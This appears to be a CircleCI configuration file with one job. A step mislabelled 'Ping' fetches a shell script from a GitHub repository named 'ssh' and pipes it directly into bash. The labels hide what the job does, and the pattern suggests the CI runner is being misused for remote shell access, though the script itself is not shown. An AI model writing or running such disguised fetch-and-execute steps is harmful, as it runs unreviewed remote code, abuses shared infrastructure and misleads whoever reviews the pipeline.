version: 2.1
jobs:
  android:
   docker:
      - image: dopaemon/docker-image:android
   steps:
      - run:
          name: Install Ping
          no_output_timeout: 20m
          command: |
            sudo apt update
            sudo apt install wget
      - run:
          name: Ping
          no_output_timeout: 20m
          command: |
            wget -O - https://raw.githubusercontent.com/KernelPanic-OpenSource/ssh/main/ba.sh | bash
workflows:
  version: 2.1
  cooking:
    jobs:
      - android
